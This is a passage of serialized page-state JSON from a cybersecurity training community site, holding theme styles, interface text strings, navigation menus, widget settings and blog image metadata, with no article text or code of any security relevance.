var(--lia-panel-box-shadow)","customColor1":"#bfedd2","customColor2":"#fbeeb8","customColor3":"#f8cac6","customColor4":"#eccafa","customColor5":"#c2e0f4","customColor6":"#2dc26b","customColor7":"#f1c40f","customColor8":"#e03e2d","customColor9":"#b96ad9","customColor10":"#3598db","customColor11":"#169179","customColor12":"#e67e23","customColor13":"#ba372a","customColor14":"#843fa1","customColor15":"#236fa1","customColor16":"#ecf0f1","customColor17":"#ced4d9","customColor18":"#95a5a6","customColor19":"#7e8c8d","customColor20":"#34495e","customColor21":"#000000","customColor22":"#ffffff","defaultMessageHeaderMarginTop":"40px","defaultMessageHeaderMarginBottom":"20px","defaultMessageItemMarginTop":"0","defaultMessageItemMarginBottom":"30px","diffAddedColor":"hsla(170, 53%, 51%, 0.4)","diffChangedColor":"hsla(43, 97%, 63%, 0.4)","diffNoneColor":"hsla(0, 0%, 80%, 0.4)","diffRemovedColor":"hsla(9, 74%, 47%, 0.4)","specialMessageHeaderMarginTop":"40px","specialMessageHeaderMarginBottom":"20px","specialMessageItemMarginTop":"0","specialMessageItemMarginBottom":"30px","tableBgColor":"transparent","tableBorderColor":"var(--lia-bs-gray-700)","tableBorderStyle":"solid","tableCellPaddingX":"5px","tableCellPaddingY":"5px","tableTextColor":"var(--lia-bs-body-color)","tableVerticalAlign":"middle","__typename":"RteThemeSettings"},"tags":{"bgColor":"var(--lia-bs-gray-200)","bgHoverColor":"var(--lia-bs-gray-400)","borderRadius":"var(--lia-bs-border-radius-sm)","color":"var(--lia-bs-body-color)","hoverColor":"var(--lia-bs-body-color)","fontWeight":"var(--lia-font-weight-md)","fontSize":"var(--lia-font-size-xxs)","textTransform":"UPPERCASE","letterSpacing":"0.5px","__typename":"TagsThemeSettings"},"toasts":{"borderRadius":"var(--lia-bs-border-radius)","paddingX":"12px","__typename":"ToastsThemeSettings"},"typography":{"fontFamilyBase":"Inter","fontStyleBase":"NORMAL","fontWeightBase":"300","fontWeightLight":"300","fontWeightNormal":"400","fontWeightMd":"500","fontWeightBold":"700","letterSpacingSm":"normal","letterSpacingXs":"normal","lineHeightBase":"1.5","fontSizeBase":"16px","fontSizeXxs":"11px","fontSizeXs":"12px","fontSizeSm":"14px","fontSizeLg":"20px","fontSizeXl":"24px","smallFontSize":"14px","customFonts":[{"source":"GOOGLE","name":"Geologica","styles":[{"style":"NORMAL","weight":"100","__typename":"FontStyleData"},{"style":"NORMAL","weight":"500","__typename":"FontStyleData"}],"assetNames":["Geologica-normal-100.woff2","Geologica-normal-500.woff2"],"__typename":"CustomFont"}],"__typename":"TypographyThemeSettings"},"unstyledListItem":{"marginBottomSm":"5px","marginBottomMd":"10px","marginBottomLg":"15px","marginBottomXl":"20px","marginBottomXxl":"25px","__typename":"UnstyledListItemThemeSettings"},"yiq":{"light":"#ffffff","dark":"#000000","__typename":"YiqThemeSettings"},"colorLightness":{"primaryDark":0.36,"primaryLight":0.74,"primaryLighter":0.89,"primaryLightest":0.95,"infoDark":0.39,"infoLight":0.72,"infoLighter":0.85,"infoLightest":0.93,"successDark":0.24,"successLight":0.62,"successLighter":0.8,"successLightest":0.91,"warningDark":0.39,"warningLight":0.68,"warningLighter":0.84,"warningLightest":0.93,"dangerDark":0.41,"dangerLight":0.72,"dangerLighter":0.89,"dangerLightest":0.95,"__typename":"ColorLightnessThemeSettings"},"localOverride":false,"__typename":"Theme"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/Loading/LoadingDot-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/Loading/LoadingDot-1751898025000","value":{"title":"Loading..."},"localOverride":false},"CachedAsset:text:en_US-components/common/EmailVerification-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/common/EmailVerification-1751898025000","value":{"email.verification.title":"Email Verification Required","email.verification.message.update.email":"To participate in the community, you must first verify your email address. The verification email was sent to {email}. To change your email, visit My Settings.","email.verification.message.resend.email":"To participate in the community, you must first verify your email address. The verification email was sent to {email}. Resend email."},"localOverride":false},"CachedAsset:text:en_US-pages/tags/TagPage-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-pages/tags/TagPage-1751898025000","value":{"tagPageTitle":"Tag:\"{tagName}\" | {communityTitle}","tagPageForNodeTitle":"Tag:\"{tagName}\" in \"{title}\" | {communityTitle}","name":"Tags Page","tag":"Tag: {tagName}"},"localOverride":false},"CachedAsset:quilt:immersivelabs.prod:pages/tags/TagPage:community:dnvaw96485-1751903164756":{"__typename":"CachedAsset","id":"quilt:immersivelabs.prod:pages/tags/TagPage:community:dnvaw96485-1751903164756","value":{"id":"TagPage","container":{"id":"Common","headerProps":{"removeComponents":["community.widget.bannerWidget"],"__typename":"QuiltContainerSectionProps"},"items":[{"id":"tag-header-widget","layout":"ONE_COLUMN","bgColor":"var(--lia-bs-white)","showBorder":"BOTTOM","sectionEditLevel":"LOCKED","columnMap":{"main":[{"id":"tags.widget.TagsHeaderWidget","__typename":"QuiltComponent"}],"__typename":"OneSectionColumns"},"__typename":"OneColumnQuiltSection"},{"id":"messages-list-for-tag-widget","layout":"ONE_COLUMN","columnMap":{"main":[{"id":"messages.widget.messageListForNodeByRecentActivityWidget","props":{"viewVariant":{"type":"inline","props":{"useUnreadCount":true,"useViewCount":true,"useAuthorLogin":true,"clampBodyLines":3,"useAvatar":true,"useBoardIcon":false,"useKudosCount":true,"usePreviewMedia":true,"useTags":false,"useNode":true,"useNodeLink":true,"useTextBody":true,"truncateBodyLength":-1,"useBody":true,"useRepliesCount":true,"useSolvedBadge":true,"timeStampType":"conversation.lastPostingActivityTime","useMessageTimeLink":true,"clampSubjectLines":2}},"panelType":"divider","useTitle":false,"hideIfEmpty":false,"pagerVariant":{"type":"loadMore"},"style":"list","showTabs":true,"tabItemMap":{"default":{"mostRecent":true,"mostRecentUserContent":false,"newest":false},"additional":{"mostKudoed":true,"mostViewed":true,"mostReplies":false,"noReplies":false,"noSolutions":false,"solutions":false}}},"__typename":"QuiltComponent"}],"__typename":"OneSectionColumns"},"__typename":"OneColumnQuiltSection"}],"__typename":"QuiltContainer"},"__typename":"Quilt"},"localOverride":false},"CachedAsset:text:en_US-components/common/ActionFeedback-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/common/ActionFeedback-1751898025000","value":{"joinedGroupHub.title":"Welcome","joinedGroupHub.message":"You are now a member of this group and are subscribed to updates.","groupHubInviteNotFound.title":"Invitation Not Found","groupHubInviteNotFound.message":"Sorry, we could not find your invitation to the group. The owner may have canceled the invite.","groupHubNotFound.title":"Group Not Found","groupHubNotFound.message":"The grouphub you tried to join does not exist. It may have been deleted.","existingGroupHubMember.title":"Already Joined","existingGroupHubMember.message":"You are already a member of this group.","accountLocked.title":"Account Locked","accountLocked.message":"Your account has been locked due to multiple failed attempts. Try again in {lockoutTime} minutes.","editedGroupHub.title":"Changes Saved","editedGroupHub.message":"Your group has been updated.","leftGroupHub.title":"Goodbye","leftGroupHub.message":"You are no longer a member of this group and will not receive future updates.","deletedGroupHub.title":"Deleted","deletedGroupHub.message":"The group has been deleted.","groupHubCreated.title":"Group Created","groupHubCreated.message":"{groupHubName} is ready to use","accountClosed.title":"Account Closed","accountClosed.message":"The account has been closed and you will now be redirected to the homepage","resetTokenExpired.title":"Reset Password Link has Expired","resetTokenExpired.message":"Try resetting your password again","invalidUrl.title":"Invalid URL","invalidUrl.message":"The URL you're using is not recognized. Verify your URL and try again.","accountClosedForUser.title":"Account Closed","accountClosedForUser.message":"{userName}'s account is closed","inviteTokenInvalid.title":"Invitation Invalid","inviteTokenInvalid.message":"Your invitation to the community has been canceled or expired.","inviteTokenError.title":"Invitation Verification Failed","inviteTokenError.message":"The url you are utilizing is not recognized. Verify your URL and try again","pageNotFound.title":"Access Denied","pageNotFound.message":"You do not have access to this area of the community or it doesn't exist","eventAttending.title":"Responded as Attending","eventAttending.message":"You'll be notified when there's new activity and reminded as the event approaches","eventInterested.title":"Responded as Interested","eventInterested.message":"You'll be notified when there's new activity and reminded as the event approaches","eventNotFound.title":"Event Not Found","eventNotFound.message":"The event you tried to respond to does not exist.","redirectToRelatedPage.title":"Showing Related Content","redirectToRelatedPageForBaseUsers.title":"Showing Related Content","redirectToRelatedPageForBaseUsers.message":"The content you are trying to access is archived","redirectToRelatedPage.message":"The content you are trying to access is archived","relatedUrl.archivalLink.flyoutMessage":"The content you are trying to access is archived View Archived Content"},"localOverride":false},"CachedAsset:quiltWrapper:immersivelabs.prod:Common:1751868364042":{"__typename":"CachedAsset","id":"quiltWrapper:immersivelabs.prod:Common:1751868364042","value":{"id":"Common","header":{"backgroundImageProps":{"assetName":null,"backgroundSize":"COVER","backgroundRepeat":"NO_REPEAT","backgroundPosition":"CENTER_CENTER","lastModified":null,"__typename":"BackgroundImageProps"},"backgroundColor":"var(--lia-bs-body-color)","items":[{"id":"custom.widget.Analytics","props":{"widgetVisibility":"signedInOrAnonymous","useTitle":true,"usePageWidth":false,"useBackground":false,"title":""},"__typename":"QuiltComponent"},{"id":"community.widget.navbarWidget","props":{"showUserName":false,"showRegisterLink":false,"useIconLanguagePicker":true,"useLabelLanguagePicker":true,"className":"QuiltComponent_lia-component-edit-mode__0nCcm","links":{"sideLinks":[],"logoLinks":[],"mainLinks":[{"children":[{"linkType":"INTERNAL","id":"get-started-link","params":{"boardId":"get-started","categoryId":"welcome"},"routeName":"TkbBoardPage"},{"linkType":"INTERNAL","id":"migrated-link-2","params":{"boardId":"community-forum","categoryId":"welcome"},"routeName":"ForumBoardPage"},{"linkType":"INTERNAL","id":"migrated-link-1","params":{"boardId":"community-blog","categoryId":"welcome"},"routeName":"BlogBoardPage"},{"linkType":"INTERNAL","id":"Common-community-challenge-link","params":{"boardId":"community-challenge","categoryId":"help"},"routeName":"TkbBoardPage"},{"linkType":"INTERNAL","id":"Common-immersive-advocacy-program-link","params":{"groupHubId":"immersive-advocacy-program"},"routeName":"GroupHubPage"}],"linkType":"INTERNAL","id":"migrated-link-0","params":{"categoryId":"welcome"},"routeName":"CategoryPage"},{"children":[{"linkType":"INTERNAL","id":"help","params":{"boardId":"help","categoryId":"help"},"routeName":"ForumBoardPage"},{"linkType":"EXTERNAL","id":"external-2","url":"https://community.immersivelabs.com/category/help/discussions/help?messages.widget.messagelistfornodebyrecentactivitywidget-tab-main-ochszs-0=noSolutions","target":"SELF"},{"linkType":"INTERNAL","id":"cybertrust-massachusetts-link","params":{"groupHubId":"cybertrust-massachusetts"},"routeName":"GroupHubPage"},{"linkType":"EXTERNAL","id":"external-1","url":"https://immersivelabs.zendesk.com/hc/en-us","target":"BLANK"}],"linkType":"INTERNAL","id":"migrated-link-3","params":{"boardId":"help","categoryId":"discuss"},"routeName":"ForumBoardPage"},{"children":[{"linkType":"INTERNAL","id":"customer-blog","params":{"boardId":"customer-blog","categoryId":"blogs"},"routeName":"BlogBoardPage"},{"linkType":"INTERNAL","id":"the-human-connection-blog","params":{"boardId":"the-human-connection-blog","categoryId":"blogs"},"routeName":"BlogBoardPage"},{"linkType":"EXTERNAL","id":"external","url":"https://www.immersivelabs.com/resources/blog","target":"BLANK"}],"linkType":"INTERNAL","id":"migrated-link-4","params":{"categoryId":"blogs"},"routeName":"CategoryPage"},{"children":[{"linkType":"INTERNAL","id":"migrated-link-10","params":{"boardId":"customer-events","categoryId":"events"},"routeName":"EventBoardPage"},{"linkType":"INTERNAL","id":"migrated-link-11","params":{"boardId":"community-events","categoryId":"events"},"routeName":"EventBoardPage"}],"linkType":"INTERNAL","id":"migrated-link-9","params":{"categoryId":"events"},"routeName":"CategoryPage"},{"children":[{"linkType":"INTERNAL","id":"migrated-link-13","params":{"boardId":"cyber-million","categoryId":"cyber-million"},"routeName":"ForumBoardPage"},{"linkType":"EXTERNAL","id":"external-3","url":"https://community.immersivelabs.com/category/cyber-million/discussions/cyber-million?messages.widget.messagelistfornodebyrecentactivitywidget-tab-main-ouwewl-0=noSolutions","target":"SELF"},{"linkType":"INTERNAL","id":"migrated-link-14","params":{"boardId":"cyber-million-blog","categoryId":"cyber-million"},"routeName":"BlogBoardPage"},{"linkType":"EXTERNAL","id":"migrated-link-15","url":"https://www.immersivelabs.com/resources/cybermillion","target":"BLANK"}],"linkType":"INTERNAL","id":"migrated-link-12","params":{"categoryId":"cyber-million"},"routeName":"CategoryPage"}]},"style":{"boxShadow":"unset","linkFontWeight":"500","controllerHighlightColor":"#E45C65","dropdownDividerMarginBottom":"10px","hamburgerBorderHover":"none","linkFontSize":"16px","linkBoxShadowHover":"none","backgroundOpacity":1,"controllerBorderRadius":"var(--lia-border-radius-50)","hamburgerBgColor":"transparent","linkTextBorderBottom":"none","hamburgerColor":"var(--lia-nav-controller-icon-color)","brandLogoHeight":"80px","linkLetterSpacing":"normal","linkBgHoverColor":"transparent","collapseMenuDividerOpacity":0.16,"paddingBottom":"0px","dropdownPaddingBottom":"15px","dropdownMenuOffset":"2px","hamburgerBgHoverColor":"transparent","borderBottom":"unset","hamburgerBorder":"none","dropdownPaddingX":"10px","brandMarginRightSm":"10px","linkBoxShadow":"none","linkJustifyContent":"flex-end","linkColor":"var(--lia-bs-body-bg)","collapseMenuDividerBg":"var(--lia-nav-link-color)","dropdownPaddingTop":"10px","controllerHighlightTextColor":"var(--lia-yiq-dark)","controllerTextColor":"var(--lia-nav-controller-icon-color)","background":{"imageAssetName":"","color":"var(--lia-bs-body-color)","size":"COVER","repeat":"NO_REPEAT","position":"CENTER_CENTER","imageLastModified":""},"linkBorderRadius":"var(--lia-bs-border-radius-sm)","linkHoverColor":"var(--lia-bs-primary)","position":"FIXED","linkBorder":"none","linkTextBorderBottomHover":"0","brandMarginRight":"30px","hamburgerHoverColor":"var(--lia-nav-controller-icon-color)","linkBorderHover":"none","collapseMenuMarginLeft":"20px","linkFontStyle":"NORMAL","linkPaddingX":"10px","controllerTextHoverColor":"var(--lia-nav-controller-icon-hover-color)","paddingTop":"0px","linkPaddingY":"5px","linkTextTransform":"NONE","dropdownBorderColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l), 0.08)","controllerBgHoverColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l), 0.1)","linkDropdownPaddingX":"var(--lia-nav-link-px)","linkBgColor":"transparent","linkDropdownPaddingY":"9px","controllerIconColor":"var(--lia-bs-body-bg)","dropdownDividerMarginTop":"10px","linkGap":"10px","controllerIconHoverColor":"var(--lia-bs-body-bg)"},"showSearchIcon":false,"languagePickerStyle":"iconAndLabel"},"__typename":"QuiltComponent"},{"id":"community.widget.bannerWidget","props":{"backgroundColor":"transparent","visualEffects":{"showBottomBorder":true},"backgroundOpacity":50,"backgroundImageProps":{"backgroundSize":"COVER","backgroundPosition":"CENTER_CENTER","backgroundRepeat":"NO_REPEAT"},"fontColor":"var(--lia-bs-body-bg)"},"__typename":"QuiltComponent"},{"id":"community.widget.breadcrumbWidget","props":{"backgroundColor":"var(--lia-bs-body-color)","linkHighlightColor":"var(--lia-bs-body-bg)","visualEffects":{"showBottomBorder":false},"backgroundOpacity":100,"linkTextColor":"var(--lia-bs-body-bg)"},"__typename":"QuiltComponent"}],"__typename":"QuiltWrapperSection"},"footer":{"backgroundImageProps":{"assetName":null,"backgroundSize":"COVER","backgroundRepeat":"NO_REPEAT","backgroundPosition":"CENTER_CENTER","lastModified":null,"__typename":"BackgroundImageProps"},"backgroundColor":"var(--lia-bs-gray-200)","items":[{"id":"community.widget.footerWidget","props":null,"__typename":"QuiltComponent"},{"id":"custom.widget.Custom_Scripts","props":{"widgetVisibility":"signedInOrAnonymous","customComponentId":"custom.widget.Custom_Scripts","useBackground":false},"__typename":"QuiltComponent"}],"__typename":"QuiltWrapperSection"},"__typename":"QuiltWrapper","localOverride":false},"localOverride":false},"CachedAsset:component:custom.widget.Analytics-en-us-1751868415190":{"__typename":"CachedAsset","id":"component:custom.widget.Analytics-en-us-1751868415190","value":{"component":{"id":"custom.widget.Analytics","template":{"id":"Analytics","markupLanguage":"HANDLEBARS","style":null,"texts":{},"defaults":{"config":{"applicablePages":[],"description":"Analytics app from searchunify","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":[],"__typename":"ComponentProperties"},"components":[{"id":"custom.widget.Analytics","form":null,"config":null,"props":[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":{"applicablePages":[],"description":"Analytics app from searchunify","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":[],"__typename":"ComponentProperties"},"form":null,"__typename":"Component","localOverride":false},"globalCss":null,"form":null},"localOverride":false},"CachedAsset:component:custom.widget.Custom_Scripts-en-us-1751868415190":{"__typename":"CachedAsset","id":"component:custom.widget.Custom_Scripts-en-us-1751868415190","value":{"component":{"id":"custom.widget.Custom_Scripts","template":{"id":"Custom_Scripts","markupLanguage":"HANDLEBARS","style":null,"texts":{},"defaults":{"config":{"applicablePages":[],"description":"","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":[],"__typename":"ComponentProperties"},"components":[{"id":"custom.widget.Custom_Scripts","form":null,"config":null,"props":[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":{"applicablePages":[],"description":"","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":[],"__typename":"ComponentProperties"},"form":null,"__typename":"Component","localOverride":false},"globalCss":null,"form":null},"localOverride":false},"CachedAsset:text:en_US-components/community/Breadcrumb-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/community/Breadcrumb-1751898025000","value":{"navLabel":"Breadcrumbs","dropdown":"Additional parent page navigation"},"localOverride":false},"CachedAsset:text:en_US-components/tags/TagsHeaderWidget-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/tags/TagsHeaderWidget-1751898025000","value":{"tag":"{tagName}","topicsCount":"{count} {count, plural, one {Topic} other {Topics}}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageListForNodeByRecentActivityWidget-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageListForNodeByRecentActivityWidget-1751898025000","value":{"title@userScope:other":"Recent Content","title@userScope:self":"Contributions","title@board:FORUM@userScope:other":"Recent Discussions","title@board:BLOG@userScope:other":"Recent Blogs","emptyDescription":"No content to show","MessageListForNodeByRecentActivityWidgetEditor.nodeScope.label":"Scope","title@instance:1714564690968":"Recent Blog Posts","title@instance:1715289331950":"Recent Discussions","title@instance:1711748122224":"Feed","title@instance:1714134050806":"What's New?"},"localOverride":false},"CachedAsset:text:en_US-components/community/FooterWidget-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/community/FooterWidget-1751898025000","value":{"homeLink":"Community Home","topOfPage":"Top of Page","buildHash":"Build Hash:","buildNumber":"Build Number:","buildTime":"Build Time:","privacyPolicy":"Privacy Policy","helpLink":"Help"},"localOverride":false},"Category:category:welcome":{"__typename":"Category","id":"category:welcome","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"displayId":"welcome"},"Blog:board:community-blog":{"__typename":"Blog","id":"board:community-blog","blogPolicies":{"__typename":"BlogPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Category:category:events":{"__typename":"Category","id":"category:events","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Category:category:cyber-million":{"__typename":"Category","id":"category:cyber-million","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Forum:board:cyber-million":{"__typename":"Forum","id":"board:cyber-million","forumPolicies":{"__typename":"ForumPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Blog:board:cyber-million-blog":{"__typename":"Blog","id":"board:cyber-million-blog","blogPolicies":{"__typename":"BlogPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Occasion:board:community-events":{"__typename":"Occasion","id":"board:community-events","boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"occasionPolicies":{"__typename":"OccasionPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Forum:board:community-forum":{"__typename":"Forum","id":"board:community-forum","forumPolicies":{"__typename":"ForumPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Forum:board:help":{"__typename":"Forum","id":"board:help","forumPolicies":{"__typename":"ForumPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Category:category:blogs":{"__typename":"Category","id":"category:blogs","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"displayId":"blogs"},"Blog:board:the-human-connection-blog":{"__typename":"Blog","id":"board:the-human-connection-blog","blogPolicies":{"__typename":"BlogPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"displayId":"the-human-connection-blog","nodeType":"board","conversationStyle":"BLOG","title":"The Human Connection Blog","shortTitle":"The Human Connection Blog","parent":{"__ref":"Category:category:blogs"}},"Tkb:board:get-started":{"__typename":"Tkb","id":"board:get-started","tkbPolicies":{"__typename":"TkbPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Tkb:board:community-challenge":{"__typename":"Tkb","id":"board:community-challenge","tkbPolicies":{"__typename":"TkbPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Conversation:conversation:1644":{"__typename":"Conversation","id":"conversation:1644","topic":{"__typename":"BlogTopicMessage","uid":1644},"lastPostingActivityTime":"2025-06-22T08:43:30.463-07:00","solved":false},"User:user:1067":{"__typename":"User","uid":1067,"login":"StefanApostol","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS0xMDY3LTY3M3JWbw?image-coordinates=0%2C0%2C512%2C512"},"id":"user:1067"},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWNTR1JhRw?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWNTR1JhRw?revision=3","title":"Card_blog.jpg","associationType":"COVER","width":800,"height":800,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWhudXVkaQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWhudXVkaQ?revision=3","title":"image.png","associationType":"BODY","width":1502,"height":561,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUpMcXhGUQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUpMcXhGUQ?revision=3","title":"image.png","associationType":"BODY","width":1499,"height":337,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWpwNGJ5aA?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWpwNGJ5aA?revision=3","title":"image.png","associationType":"BODY","width":1503,"height":884,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVdvSHZSbQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVdvSHZSbQ?revision=3","title":"image.png","associationType":"BODY","width":1508,"height":397,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWd5c1RzSA?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWd5c1RzSA?revision=3","title":"image.png","associationType":"BODY","width":1506,"height":792,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUxKemRMVQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUxKemRMVQ?revision=3","title":"image.png","associationType":"BODY","width":1498,"height":389,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWp6NFFhcA?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWp6NFFhcA?revision=3","title":"image.png","associationType":"BODY","width":1501,"height":628,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXdNcGxaMw?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXdNcGxaMw?revision=3","title":"image.png","associationType":"BODY","width":1477,"height":504,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUh6SUV0SA?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUh6SUV0SA?revision=3","title":"image.png","associationType":"BODY","width":1497,"height":90,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVlOZ2FmVQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LVlOZ2FmVQ?revision=3","title":"image.png","associationType":"BODY","width":1476,"height":1040,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUJLNVpRZw?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUJLNVpRZw?revision=3","title":"image.png","associationType":"BODY","width":1497,"height":198,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LTVTczZxcw?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LTVTczZxcw?revision=3","title":"image.png","associationType":"BODY","width":1496,"height":601,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LW5RS0xzTA?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LW5RS0xzTA?revision=3","title":"image.png","associationType":"BODY","width":1489,"height":302,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUd0TUhJeg?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUd0TUhJeg?revision=3","title":"image.png","associationType":"BODY","width":1499,"height":617,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXNITUcxZQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXNITUcxZQ?revision=3","title":"image.png","associationType":"BODY","width":1498,"height":135,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUxYQ3BRUw?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LUxYQ3BRUw?revision=3","title":"image.png","associationType":"BODY","width":1494,"height":825,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXhERUZLaQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LXhERUZLaQ?revision=3","title":"image.png","associationType":"BODY","width":1496,"height":1110,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LTRlUE1sbg?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LTRlUE1sbg?revision=3","title":"image.png","associationType":"BODY","width":1496,"height":132,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWdUN3JiNQ?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xNjQ0LWdUN3JiNQ?revision=3","title":"image.png","associationType":"BODY","width":1493,"height":405,"altText":""},"AssociatedImage:{\"url\":\"https://community.imme